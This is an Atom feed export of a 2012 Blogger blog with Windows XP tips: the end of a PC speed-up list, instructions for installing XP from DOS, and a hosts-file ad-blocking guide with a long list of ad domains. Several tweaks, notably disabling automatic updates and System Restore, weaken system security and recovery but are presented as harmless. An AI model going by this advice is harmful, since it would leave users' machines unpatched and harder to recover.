&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; System &amp;gt; Hardware &amp;gt; Device Manager&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&amp;gt; IDE ATA/ATAPI Controllers &amp;gt; 
Right Click Primary IDE channel and&amp;nbsp;Secondary IDE channel &amp;gt; 
Properties &amp;gt; Advanced Settings Tab &amp;gt; Tra&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;9. Disable System Sounds&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: magenta;"&gt;&lt;b&gt;&lt;span style="background-color: white;"&gt;&lt;/span&gt;&lt;span style="background-color: white;"&gt;&lt;span style="color: magenta;"&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Sounds and Audio Devices &amp;gt; Sounds&amp;nbsp;Tab &amp;gt; Sound Scheme to None.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;10. Do Not Map Through Sound card&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Sounds and Audi&lt;span style="background-color: white;"&gt;&lt;/span&gt;o Devices 
&amp;gt; Hardware&amp;nbsp;Tab &amp;gt; (highlight your soundcard from the list) &amp;gt; 
Properties &amp;gt; Audio&amp;nbsp;Devices &amp;gt; (highlight your soundcard from the 
list) &amp;gt; Properties&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;11. Disable System Restore&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel&amp;gt; System &amp;gt; System Restore Tab. Tick&amp;nbsp;the “Turn off System Restore on all Drives”&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;12. Disable Automatic Updates&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel&amp;gt; System &amp;gt; Automatic Updates
 &amp;gt; Turn&amp;nbsp;off automatic updating. I want to update my computer manually&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;13. Startup and Recovery Options&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel&amp;gt; System &amp;gt; Advanced &amp;gt; 
Startup and&amp;nbsp;Recovery Settings &amp;gt; Untick Automatically Restart&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;14. Disable Error Reporting&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel&amp;gt; System &amp;gt; Advanced &amp;gt; Error Reporting&amp;nbsp;&amp;gt; Disable Error Reporting&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;15. Disable Remote Assistance&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel&amp;gt; System &amp;gt; Remote &amp;gt; 
Untick Allow&amp;nbsp;remote assistance invitations to be sent from this computer&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;16. Fix Swap File (Virtual Memory)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; System &amp;gt; Advanced &amp;gt; 
Performance&amp;nbsp;Settings &amp;gt; Advanced &amp;gt; Virtual Memory Change &amp;gt; 
Custom Size. Set initial&amp;nbsp;and maximum size to the same value&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;17. Speed Up Menus&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Run &amp;gt; Regedit &amp;gt; HKEY_CURRENT_ USER &amp;gt; Control Panel &amp;gt; Desktop&amp;nbsp;Folder. Set MenuShowDelay to 1&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;18. Disable Offline Files&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Folder Options &amp;gt; Offline Files&amp;nbsp;Untick “Enable Offline Files”&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;19. Disable Remote Desktop&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; System &amp;gt; Remote &amp;gt; Untick “Allow&amp;nbsp;users to connect remotely to this computer”&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;20. Disable Internet Synchronise Time&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Date and Time &amp;gt; Internet 
Time &amp;gt;&amp;nbsp;Untick “Automatically synchronize with internet time server”&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;21. Disable Hide Inactive Icons&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Start &amp;gt; Settings &amp;gt; Taskbar and Start Menu &amp;gt; Taskbar TAB &amp;gt; Uncheck&amp;nbsp;”Hide Inactive Icons”&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;22. Disable Automatic Desktop Cleanup Wizard&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Display &amp;gt; Desktop &amp;gt; 
Customise&amp;nbsp;Desktop &amp;gt; Untick “Run Desktop Cleanup Wizard every 60 days”&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;23. Disable NTFS Last Access Time Logging (NTFS File Systems Only)&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Start &amp;gt; Run &amp;gt; regedit &amp;gt; HKEY_LOCAL_MACHINE &amp;gt; System 
&amp;gt;&amp;nbsp;CurrentControlSet &amp;gt; Control &amp;gt; Filesystem. Add a new DWORD 
value -&amp;nbsp;”NtfsDisableLastAcc essUpdate” and set value to 1.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;24. Disable Notification Area Balloon Tips&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Start &amp;gt; Run &amp;gt; regedit &amp;gt; HKEY_CURRENT_ USER &amp;gt; Software &amp;gt; 
Microsoft &amp;gt;&amp;nbsp;Windows &amp;gt; CurrentVersion &amp;gt; Explorer &amp;gt; Advanced. 
Create a new DWORD&lt;/span&gt; &lt;span style="color: magenta;"&gt;value called EnableBalloonTips and set to 0.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;25. Disable CDROM Autoplay&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Start &amp;gt; Run &amp;gt; regedit &amp;gt; HKEY_LOCAL_MACHINE &amp;gt; System 
&amp;gt;&amp;nbsp;CurrentControlSet &amp;gt; Services &amp;gt; Cdrom. Set autorun to 0.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;26. Disable Disc Indexing Service&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;Right Click Start &amp;gt; Explorer &amp;gt; Right Click Each Disc &amp;gt; 
Properties &amp;gt;&amp;nbsp;Untick “Allow Indexing Service to index this disc for 
fast file&amp;nbsp;searching”&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;27.Restart ur pc…enjoy!! !&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-color: white; border: medium none; overflow: hidden; text-align: left; text-decoration: none;"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;There are more options to make your system faster, such as overclocking, etc. but (just about) everything I've mentioned in this tech post costs you nothing and will result in faster system performance! Good luck and if you have any questions on how to do anything mentioned here, ask a knowledgeable friend or consult a book, - don't mess up something trying to do something you are not sure of!&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;br /&gt;Good luck and I'd like to dedicate this post to all of &lt;span style="color: magenta;"&gt;&lt;a href="http://www.bdcyberarmy.tk/" target="_blank"&gt;BDCyber Army&lt;/a&gt;&lt;/span&gt; which has given me so much! You're all great, peeps!&lt;/b&gt;&lt;/span&gt;
&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Stay Connected with us and Get More Knowladge'); return true" type="button" value="Thanks For Reading" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/7730012452951406380/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=7730012452951406380&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/7730012452951406380?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/7730012452951406380?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/make-your-pc-faster-guarnted-using.html' title='Make your pc faster Guarnted using simple Tips !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-yDe1pRevKbE/UHxkyOG3GSI/AAAAAAAAAMw/XjxRQplRUQI/s72-c/computer-RUN-FASTer.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;AkAHSX87cSp7ImA9WhNTE08.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-1610240721819113268</id><published>2012-10-16T01:18:00.001+06:00</published><updated>2012-10-16T01:18:58.109+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T01:18:58.109+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Windows computer tips'/><category scheme='http://www.blogger.com/atom/ns#' term='PC Tips'/><title>How to Install Xp From Dos !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Install Xp From Dos&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-5_16Y-H9vLo/UHxhbKlXBSI/AAAAAAAAAMc/FliLS_cQrG4/s1600/windows_xp.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="197" src="http://3.bp.blogspot.com/-5_16Y-H9vLo/UHxhbKlXBSI/AAAAAAAAAMc/FliLS_cQrG4/s320/windows_xp.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;If XP will not install from the CD or if you have a new drive with no operating system on&lt;br /&gt;it yet try these:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Install Windows XP from the hard drive with Windows 98 already installed:&lt;br /&gt;&lt;br /&gt;Boot Windows 98&lt;br /&gt;Insert the XP CD into your CD reader&lt;br /&gt;Explore Windows XP through My Computer&lt;br /&gt;Copy i386 folder to C:\&lt;br /&gt;Go into C:\i386 folder and double click on winnt32.exe to launch the setup from the hard drive&lt;br /&gt;&lt;br /&gt;Install Windows XP from DOS (ie. no OS on a new hard drive):&lt;br /&gt;&lt;br /&gt;Boot with a Windows 98 Start Up disk&lt;br /&gt;Insert the Windows 98 CD into the CD reader&lt;br /&gt;Run smartdrv.exe from the Win98 directory on the windows 98 CD (file caching)&lt;br /&gt;Type cd.. to back up to the root directory&lt;br /&gt;Insert Windows XP CD into the CD reader&lt;br /&gt;Copy the i386 folder to C:\&lt;br /&gt;Go into C:\i386 folder on C: and type winnt.exe to launch the setup from the hard drive.&lt;/b&gt;&lt;/span&gt;&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Stay Connected with us and Get More Knowladge'); return true" type="button" value="Thanks For Reading" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/1610240721819113268/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=1610240721819113268&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/1610240721819113268?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/1610240721819113268?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/how-to-install-xp-from-dos.html' title='How to Install Xp From Dos !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-5_16Y-H9vLo/UHxhbKlXBSI/AAAAAAAAAMc/FliLS_cQrG4/s72-c/windows_xp.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;AkUHSHk8fyp7ImA9WhNTE08.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-8136175797896519476</id><published>2012-10-16T01:10:00.000+06:00</published><updated>2012-10-16T01:10:39.777+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T01:10:39.777+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Windows computer tips'/><category scheme='http://www.blogger.com/atom/ns#' term='PC Tips'/><title>Block Adservers Manualy By Simple Method !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello visitor,&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-93NLQMCUGgg/UHxfMAl1PrI/AAAAAAAAAMU/5CstcLCHr-8/s1600/block-annoying-ads-server.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-93NLQMCUGgg/UHxfMAl1PrI/AAAAAAAAAMU/5CstcLCHr-8/s1600/block-annoying-ads-server.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="color: #073763;"&gt;&lt;u&gt;&lt;b&gt;Block Ads&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; Today I'll Explain How to Block Adservers By Simple Method !.It is Simple and Easy tricks u Must Do it.if you wanna remove those nasty ads from the pages which waste lot of time and bandwidth then here is something for you I belive it will help you a lot&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;&lt;b&gt;how it works&lt;/b&gt;&lt;b&gt;?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;It's possible to set up a name server as authoritative for any domain you choose, allowing you to specify the DNS records for that domain. You can also configure most computers to be sort of mini-nameservers for themselves, so that they check their own DNS records before asking a nameserver. Either way, you get to say what hostname points to what IP address. If you haven't guessed already, the way you block ads it to provide bogus information about the domains we don't want to see - ie, all those servers out there that dedicate their existence to spewing out banner ads.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;The hosts file&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;Probably the most common way people block ads like this is with something called the "hosts file". The hosts file is a simple list of hostnames and their corresponding IP addresses, which your computer looks at every time you try and contact a previously unknown hostname. If it finds an entry for the computer you're trying to reach, it sets the IP address for that computer to be whatever's in the hosts file.127.0.0.1 is a special IP address which, to a computer, always means that computer. Any time a machine sends a network request to 127.0.0.1, it is talking to itself. This is very useful when it comes to blocking ads, because all we have to do is specify the IP address of any ad server to be 127.0.0.1. And to do that, all we have to do is edit the hosts file. What will happen then is something like this:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;b&gt;1. you visit a web page&lt;br /&gt;&amp;nbsp; 2. the web page contains a banner ad stored on the server "ads.example.com"&lt;br /&gt;&amp;nbsp; 3. your computer says "ads.example.com? never heard of it. wait a second, let's see if I've got the number on me..."&lt;br /&gt;&amp;nbsp; 4. your computer finds its hosts file and checks to see if ads.example.com is listed&lt;br /&gt;&amp;nbsp; 5. it finds the hostname, which points to 127.0.0.1&lt;br /&gt;&amp;nbsp; 6. "great", says the computer, and sends off a request to 127.0.0.1 for the banner ad that's supposed to be on the page&lt;br /&gt;&amp;nbsp; 7. "oh", says the computer, and fails to show anything because it just sent a request to itself for a banner ad&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;&lt;b&gt;&amp;nbsp; Where's my hosts file?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="color: #38761d;"&gt;&lt;b&gt;* Windows 95 / 98 / ME: C:\Windows (I think)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Windows NT: C:\WinNT\hosts&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Windows 2000: C:\WinNT\system32\drivers\etc\&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Windows XP: C:\Windows\System32\drivers\etc&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * FreeBSD / Linux / Mac OS X / Unixish operating systems: /etc/hosts&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Classic Mac OS: please read this helpful information submitted by David "iNerd" B&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; * Mac OS 9: Marcia Skidmore sent in details that hopefully explain what you need to know&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;The format of the hosts file is very simple - IP address, whitespace, then a list of hostnames (except for older Macs; please see above). However, you don't need to know anything about the format if you don't want to as you can just view the list hosts file.Of course, that's not the only way to use the list, but it's probably the most simple for most people.&lt;br /&gt;here is the hosts list which are serving you the ads just append it to your hosts file and enjoy ad free surfing makes things faster. if you want ad from certain site then just remove it from the list below.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;&lt;b&gt;QUOTE&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: magenta;"&gt;&lt;b&gt;127.0.0.1 007arcadegames.com&lt;br /&gt;127.0.0.1 101order.com&lt;br /&gt;127.0.0.1 123banners.com&lt;br /&gt;127.0.0.1 123found.com&lt;br /&gt;127.0.0.1 180searchassistant.com&lt;br /&gt;127.0.0.1 180solutions.com&lt;br /&gt;127.0.0.1 247media.com&lt;br /&gt;127.0.0.1 247realmedia.com&lt;br /&gt;127.0.0.1 24pm-affiliation.com&lt;br /&gt;127.0.0.1 2log.com&lt;br /&gt;127.0.0.1 2o7.net&lt;br /&gt;127.0.0.1 4affiliate.net&lt;br /&gt;127.0.0.1 4d5.net&lt;br /&gt;127.0.0.1 7adpower.com&lt;br /&gt;127.0.0.1 911promotion.com&lt;br /&gt;127.0.0.1 a-counter.kiev.ua&lt;br /&gt;127.0.0.1 a.consumer.net&lt;br /&gt;127.0.0.1 a.gismeteo.ru&lt;br /&gt;127.0.0.1 a.mktw.net&lt;br /&gt;127.0.0.1 a.r.tv.com&lt;br /&gt;127.0.0.1 a.xanga.com&lt;br /&gt;127.0.0.1 a32.g.a.yimg.com&lt;br /&gt;127.0.0.1 aaddzz.com&lt;br /&gt;127.0.0.1 abcnews.footprint.net&lt;br /&gt;127.0.0.1 abetterinternet.com&lt;br /&gt;127.0.0.1 abz.com&lt;br /&gt;127.0.0.1 ac.rnm.ca&lt;br /&gt;127.0.0.1 accelerator-media.com&lt;br /&gt;127.0.0.1 accipiter.speedera.net&lt;br /&gt;127.0.0.1 action.ientry.net&lt;br /&gt;127.0.0.1 actionsplash.com&lt;br /&gt;127.0.0.1 actualdeals.com&lt;br /&gt;127.0.0.1 ad-annex.com&lt;br /&gt;127.0.0.1 ad-flow.com&lt;br /&gt;127.0.0.1 ad-images.suntimes.com&lt;br /&gt;127.0.0.1 ad-logics.com&lt;br /&gt;127.0.0.1 ad-rotator.com&lt;br /&gt;127.0.0.1 ad-server.gulasidorna.se&lt;br /&gt;127.0.0.1 ad-souk.com&lt;br /&gt;127.0.0.1 ad-space.net&lt;br /&gt;127.0.0.1 ad-tech.com&lt;br /&gt;127.0.0.1 ad-universe.com&lt;br /&gt;127.0.0.1 ad-up.com&lt;br /&gt;127.0.0.1 ad.100.tbn.ru&lt;br /&gt;127.0.0.1 ad.37.com&lt;br /&gt;127.0.0.1 ad.4web.cz&lt;br /&gt;127.0.0.1 ad.71i.de&lt;br /&gt;127.0.0.1 ad.a8.net&lt;br /&gt;127.0.0.1 ad.abcnews.com&lt;br /&gt;127.0.0.1 ad.abctv.com&lt;br /&gt;127.0.0.1 ad.about.com&lt;br /&gt;127.0.0.1 ad.aboutit.de&lt;br /&gt;127.0.0.1 ad.aboutwebservices.com&lt;br /&gt;127.0.0.1 ad.aftonbladet.se&lt;br /&gt;127.0.0.1 ad.allstar.cz&lt;br /&gt;127.0.0.1 ad.altervista.org&lt;br /&gt;127.0.0.1 ad.asap-asp.net&lt;br /&gt;127.0.0.1 ad.bondage.com&lt;br /&gt;127.0.0.1 ad.centrum.cz&lt;br /&gt;127.0.0.1 ad.cgi.cz&lt;br /&gt;127.0.0.1 ad.chip.de&lt;br /&gt;127.0.0.1 ad.clix.pt&lt;br /&gt;127.0.0.1 ad.digitallook.com&lt;br /&gt;127.0.0.1 ad.directconnect.se&lt;br /&gt;127.0.0.1 ad.disney.go.com&lt;br /&gt;127.0.0.1 ad.domainfactory.de&lt;br /&gt;127.0.0.1 ad.dvdforum.nu&lt;br /&gt;127.0.0.1 ad.e-kolay.net&lt;br /&gt;127.0.0.1 ad.e-not.net&lt;br /&gt;127.0.0.1 ad.eurosport.com&lt;br /&gt;127.0.0.1 ad.ezpeer.com&lt;br /&gt;127.0.0.1 ad.fido.net&lt;br /&gt;127.0.0.1 ad.fragzone.se&lt;br /&gt;127.0.0.1 ad.free6.com&lt;br /&gt;127.0.0.1 ad.grafika.cz&lt;br /&gt;127.0.0.1 ad.harmony-central.com&lt;br /&gt;127.0.0.1 ad.hbv.de&lt;br /&gt;127.0.0.1 ad.howstuffworks.com&lt;br /&gt;127.0.0.1 ad.hyena.cz&lt;br /&gt;127.0.0.1 ad.iinfo.cz&lt;br /&gt;127.0.0.1 ad.ilse.nl&lt;br /&gt;127.0.0.1 ad.img.yahoo.co.kr&lt;br /&gt;127.0.0.1 ad.infoseek.com&lt;br /&gt;127.0.0.1 ad.investopedia.com&lt;br /&gt;127.0.0.1 ad.ir.ru&lt;br 